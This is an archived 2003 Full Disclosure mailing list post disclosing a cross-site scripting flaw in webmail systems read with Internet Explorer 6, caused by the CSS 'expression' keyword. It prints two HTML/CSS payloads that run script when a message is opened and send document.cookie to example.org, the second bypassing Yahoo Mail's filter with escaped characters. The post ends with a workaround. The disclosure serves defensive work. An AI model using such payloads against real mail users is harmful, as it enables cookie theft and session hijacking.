Full Disclosure mailing list archives
Webmails (including Yahoo) + IE 6 = XSS
From: Jedi/Sector One <j () pureftpd org>
Date: Mon, 29 Sep 2003 16:28:24 +0200
Internet Explorer has an useless feature that allows evaluation of Javascript expressions in style sheets through the "expression" keyword. It allows execution of arbitrary javascript as soon as an HTML message is read in older versions of Outlook and in most webmail systems filtering <script> tags : <html> <body> <style type="text/css"> h1 { height:expression(alert(42)); background-image:expression('url(http://example.org/'+document.cookie+')'); } </style> <h1>...</h1> </body> </html> Yahoo! mail has a filter against this, that replaces "expression" with "_expression". Unfortunately, this filter is easy to bypass using escaped characters that are valid CSS and that are properly handled by IE 6. <html> <body> <style type="text/css"> h1 { he\ight:e\xpression(alert(42)); bac\kground-image:e\xpression('url(http://example.org/'+document.cookie+')'); } </style> <h1>...</h1> </body> </html> Workaround until all existing webmail software is fixed (...) : disable Javascript and/or use any other web browser that focuses on W3C compliance instead of implementing insecure bloat. -- __ /*- Frank DENIS (Jedi/Sector One) <j () 42-Networks Com> -*\ __ \ '/ <a href="http://www.PureFTPd.Org/"> Secure FTP Server </a> \' / \/ <a href="http://www.Jedi.Claranet.Fr/"> Misc. free software </a> \/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Webmails (including Yahoo) + IE 6 = XSS Jedi/Sector One (Sep 29)